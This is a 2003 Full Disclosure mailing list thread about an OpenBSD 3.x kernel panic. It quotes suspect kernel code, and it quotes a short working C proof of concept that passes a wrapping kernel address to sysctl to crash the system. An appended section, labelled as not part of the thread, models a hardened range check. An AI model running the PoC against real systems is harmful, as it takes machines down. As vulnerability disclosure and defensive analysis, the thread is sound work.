Full Disclosure mailing list archives
Re: OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0
From: noir () uberhax0r net
Date: Thu, 20 Nov 2003 16:58:57 -0500 (EST)
i can confirm this SECURITY vulnerability on all openbsd 3.x. so apparently searching for "XXX" and/or "FIXME" strings in obsd kernel is a guaranteed way to locate a ring 0 vulnerability ... nice, real nice ;P

some examples;

	char buf[128], *bufp; /* FIXME */
	int len = sh.s_size, path_index, entry_len;

	/* DPRINTF(("COFF shlib size %d offset %d\n", sh.s_size, sh.s_scnptr)); */
	error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t) buf, len, sh.s_scnptr, ...

/*
 * vslock: wire user memory for I/O
 *
 * - called from physio and sys___sysctl
 * - XXXCDC: consider nuking this (or making it a macro?)
 */

void
uvm_vsunlock(p, addr, len)
	struct proc *p;
	caddr_t addr;
	size_t len;
{
	uvm_fault_unwire(&p->p_vmspace->vm_map, trunc_page((vaddr_t)addr),
	    round_page((vaddr_t)addr + len));
}

grep -rn or cscope is your friend ;)

On Wed, 19 Nov 2003 crispin () immunix com wrote:
> ppl think "hey, local DoS sucks", therefore they are.
> i think "hey, obsd sucks", therefore i am.
>
> #include <stdio.h>
> #include <sys/param.h>
> #include <sys/sysctl.h>
>
> int
> main ()
> {
>   unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;
>   return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
> }
>
> it's wide, it's opened, it's surely obsd!
>
> --
> Crispin Coward, Ph.D. http://immunix.com/~crispin/
> Chief Scientist, Immunix http://immunix.com http://www.immunix.com/tosell/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
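The following is an added example, not part of noir's or crispin's messages and not OpenBSD code: a user-space C model of the range check a kernel should apply to a user-supplied (addr, len) pair before wiring it, as the quoted vslock/uvm_vsunlock path does on behalf of sysctl. It models a 32-bit kernel with uint32_t addresses, so the effect of the quoted round_page((vaddr_t)addr + len) idiom on the PoC's address of -4096 + 1 is visible: the rounded end wraps to zero and lands below the start. PAGE_SIZE, VM_USER_LIMIT, naive_wired_end and check_user_range are assumed, illustrative names and values, not OpenBSD's; the hardened check computes the rounded end in wider arithmetic and bounds it against the user-space ceiling, rejecting the request before anything is wired.

```c
/* Added example, not from the thread or from OpenBSD: model the range
 * check that belongs in front of a "wire user memory" routine. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

typedef uint32_t vaddr_t;               /* model a 32-bit kernel, as in the 2003 PoC */

#define PAGE_SIZE      4096u            /* assumed page size */
#define PAGE_MASK      (PAGE_SIZE - 1u)
#define VM_USER_LIMIT  0xbfc00000u      /* assumed user/kernel split; illustrative only */

/* Same arithmetic as the kernel macros quoted in the post, in 32 bits. */
static vaddr_t trunc_page(vaddr_t v) { return v & ~PAGE_MASK; }
static vaddr_t round_page(vaddr_t v) { return (v + PAGE_MASK) & ~PAGE_MASK; }

/* The unchecked computation: what end address the wire/unwire call would
 * receive for a user-supplied (addr, len).  For addr = -4096 + 1
 * (0xfffff001) and len = 0 this wraps to 0, i.e. below trunc_page(addr). */
vaddr_t naive_wired_end(vaddr_t addr, uint32_t len)
{
    return round_page(addr + len);
}

/* Hardened check: 0 if [addr, addr+len) may be wired, EFAULT otherwise.
 * The end is rounded in 64-bit arithmetic so the 32-bit wrap cannot hide,
 * and the whole rounded range must stay below the user-space ceiling. */
int check_user_range(vaddr_t addr, uint32_t len)
{
    uint64_t end = (uint64_t)addr + len;                      /* no overflow here */
    uint64_t rend = (end + PAGE_MASK) & ~(uint64_t)PAGE_MASK; /* page-round the end */

    if (rend > VM_USER_LIMIT)   /* also catches any end >= 2^32, i.e. the wrap case */
        return EFAULT;
    if (trunc_page(addr) >= VM_USER_LIMIT)
        return EFAULT;
    return 0;
}

/* Stand-alone demo: the PoC's values against both computations. */
int main(void)
{
    vaddr_t poc_addr = (vaddr_t)(-4096 + 1);   /* 0xfffff001, as in the quoted PoC */

    printf("trunc_page(addr) = 0x%08x\n", trunc_page(poc_addr));
    printf("naive end        = 0x%08x (wrapped below start)\n",
           naive_wired_end(poc_addr, 0));
    printf("check_user_range = %d (EFAULT = %d)\n",
           check_user_range(poc_addr, 0), EFAULT);
    printf("sane request     = %d\n", check_user_range(0x1000u, 100));
    return 0;
}
```

The first check in check_user_range is enough on its own to reject the wrapped range, since a rounded end of 0x100000000 exceeds any 32-bit user-space limit; the second check catches a start address that is itself in kernel space. The same two conditions apply to any syscall that page-wires a caller-supplied buffer, not only sysctl.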